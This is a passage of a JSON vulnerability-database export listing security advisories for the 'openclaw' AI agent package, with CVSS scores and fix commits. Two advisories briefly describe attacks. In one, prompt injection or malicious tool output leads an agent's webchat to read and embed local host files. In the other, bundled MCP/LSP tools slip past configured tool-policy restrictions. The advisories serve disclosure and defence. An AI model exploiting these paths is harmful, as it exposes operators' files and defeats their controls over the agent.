vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84fd-3yvx-rfgq"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2t8-px5b-nfgd"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-aawy-8xg4-1uen"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-afkf-r949-dkgu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b7hq-mrhg-b3bk"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dsvn-dpb5-tfdz"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-ewa7-qswv-tqet"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-ftdn-9fum-cbe4"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gv2d-gfs7-gfh1"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hse8-g1e9-dbay"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-hzbt-fbgp-h7fd"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k7fe-dqzc-kbcm"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcba-tshp-77d6"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kh5u-hg46-3qha"},{"vulnerability":"VCID-kthe-sgfb-kkb2"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mkka-hf2q-pfhp"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-njsr-j7vm-cqg8"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-nzu6-7a1g-4kf2"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-p984-bgmq-zqc9"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q38j-b9g9-8yar"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qhr2-jktm-uycx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-qr66-xgea-tufh"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkjm-wcmt-43br"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sj4d-eenz-zqet"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tkxh-m458-6ydw"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-u9ja-dgsh-yug2"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-w8sb-7ymy-wkez"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xdr6-tfsy-rqeu"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpnh-32hh-p7fb"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-y8jc-h9ft-auge"},{"vulnerability":"VCID-ycse-95bv-7ua9"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-z8sm-pm9t-wyhu"},{"vulnerability":"VCID-z9a2-t66z-buga"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.8"}],"aliases":["GHSA-wwrj-437c-ppq4"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-gj27-bfws-uyfp"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89007?format=json","vulnerability_id":"VCID-gk95-28x9-17dk","summary":"OpenClaw: Webchat audio embedding could read local files without local-root containment\n## Impact\n\nOpenClaw deployments before `2026.4.15` could embed host-local audio files into webchat responses without applying the local media root containment check used by other media-serving paths.\n\nIf an attacker could influence an agent or tool-produced `ReplyPayload.mediaUrl`, the webchat audio embedding helper could resolve an absolute local path or `file:` URL, read an audio-like file under the size cap, and base64-encode it into the webchat media response. This crossed the model/tool-output boundary into a host file read. Prompt injection or malicious tool output is a delivery mechanism; the security boundary failure is the missing local-root containment check.\n\nThe impact is narrow: the file had to be readable by the gateway process, have an audio-like extension, and fit within the webchat audio size cap. The issue exposed contents into the webchat assistant/media transcript path; it was not a general remote filesystem API.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` on npm\n- Affected versions: `<= 2026.4.14`\n- Patched version: `2026.4.15`\n\nThe latest public release, `2026.4.21`, also contains the fix.\n\n## Patches\n\nThe public fix threads the applicable local media roots into the webchat audio embedding path and calls `assertLocalMediaAllowed` before local audio content is read. Current `main` also includes an additional `trustedLocalMedia` gate so untrusted model/tool payloads cannot opt into local audio embedding.\n\nFix commit:\n\n- `6e58f1f9f54bca1fea1268ec0ee4c01a2af03dde`\n\n## Workarounds\n\nUpgrade to `openclaw@2026.4.15` or later. The latest public release, `2026.4.21`, is fixed. Before upgrading, avoid exposing webchat sessions to untrusted prompt/tool content that can influence reply media URLs.\n\n## Credits\n\nOpenClaw thanks @zsxsoft for reporting.","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/6e58f1f9f54bca1fea1268ec0ee4c01a2af03dde","reference_id":"","reference_type":"","scores":[{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/6e58f1f9f54bca1fea1268ec0ee4c01a2af03dde"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-gfg9-5357-hv4c","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-gfg9-5357-hv4c"},{"reference_url":"https://github.com/advisories/GHSA-gfg9-5357-hv4c","reference_id":"GHSA-gfg9-5357-hv4c","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-gfg9-5357-hv4c"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109881?format=json","purl":"pkg:npm/openclaw@2026.4.15","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2yd-uw91-9yck"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.15"}],"aliases":["GHSA-gfg9-5357-hv4c"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-gk95-28x9-17dk"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89411?format=json","vulnerability_id":"VCID-gkyv-ahk7-1ud3","summary":"OpenClaw: Bundled MCP/LSP tools could bypass configured tool policy\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `< 2026.4.20`\n- Patched version: `2026.4.20`\n\n## Impact\n\nBundled MCP and LSP tools could be appended to the agent's effective tool set after the normal tool-policy pipeline had already filtered core tools. If an operator configured a restrictive policy, such as a tool profile, explicit allow/deny list, owner-only tool restriction, sandbox tool policy, or subagent tool policy, a bundled MCP/LSP tool could remain available even though the same policy would have denied it.\n\nThe issue required a configured bundled MCP or LSP tool source and an operator policy that should have restricted that tool. This was a local agent policy-enforcement bypass, not an unauthenticated remote gateway compromise. Severity is medium.\n\n## Fix\n\nOpenClaw now applies a final effective tool policy pass to bundled MCP/LSP tools before merging them into the tool set used by normal runs and compaction. The pass covers profile policy, provider profile policy, global/agent/group policies, owner-only filtering, sandbox tool policy, and subagent tool policy.\n\nFix commit:\n\n- `0e7a992d3f3155199c1acc2dd9a53c5b3a4d3ada`\n\n## Release\n\nFixed in OpenClaw `2026.4.20`.","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/0e7a992d3f3155199c1acc2dd9a53c5b3a4d3ada","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/0e7a992d3f3155199c1acc2dd9a53c5b3a4d3ada"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-qrp5-gfw2-gxv4","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"4.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-qrp5-gfw2-gxv4"},{"reference_url":"https://github.com/advisories/GHSA-qrp5-gfw2-gxv4","reference_id":"GHSA-qrp5-gfw2-gxv4","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-qrp5-gfw2-gxv4"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109923?format=json","purl":"pkg:npm/openclaw@2026.4.20","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-ymmv-2qmq-6kap"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.20"}],"aliases":["GHSA-qrp5-gfw2-gxv4"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-gkyv-ahk7-1ud3"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91602?format=json","vulnerability_id":"VCID-gncw-wfqt-9yek","summary":"OpenClaw Telegram media fetch errors exposed bot tokens in logged file URLs\n### Summary\n`openclaw` versions `<= 2026.3.12` could include raw Telegram bot tokens in media fetch error strings when inbound Telegram media downloads failed.\n\n### Affected Packages / Versions\n- Package: `openclaw` (`npm`)\n- Affected versions: `<= 2026.3.12`\n- Fixed version: `2026.3.13`\n\n### Details\nThe vulnerable path was `fetchRemoteMedia()` in `src/media/fetch.ts`. In affected releases, fetch and HTTP error paths embedded the original Telegram file URL into `MediaFetchError` messages. For Telegram media, those URLs can include `/file/bot<TOKEN>/...`, so the resulting error strings could leak bot tokens into logs, console output, or any downstream error surface that rendered the exception text.\n\nThis issue is in scope under OpenClaw's trust model because the leaked secret is an OpenClaw-operated integration credential, not a user-supplied third-party secret.\n\n### Fix\n`openclaw@2026.3.13` redacts sensitive media URLs before constructing fetch error messages. Current code routes the source URL and follow-on error paths through `redactMediaUrl()` / `redactSensitiveText()`, so Telegram bot tokens are no longer emitted in those error strings.\n\nRegression coverage exists in `src/media/fetch.test.ts` (`redacts Telegram bot tokens from fetch failure messages` and `redacts Telegram bot tokens from HTTP error messages`).\n\n### Fix Commit(s)\n- `7a53eb7ea8295b08be137e231c9a98c1a79b5cd5`\n\nThanks @space08 for reporting.","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/7a53eb7ea8295b08be137e231c9a98c1a79b5cd5","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/7a53eb7ea8295b08be137e231c9a98c1a79b5cd5"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-xwcj-hwhf-h378","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-xwcj-hwhf-h378"},{"reference_url":"https://github.com/advisories/GHSA-xwcj-hwhf-h378","reference_id":"GHSA-xwcj-hwhf-h378","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-xwcj-hwhf-h378"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/113139?format=json","purl":"pkg:npm/openclaw@2026.3.13","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"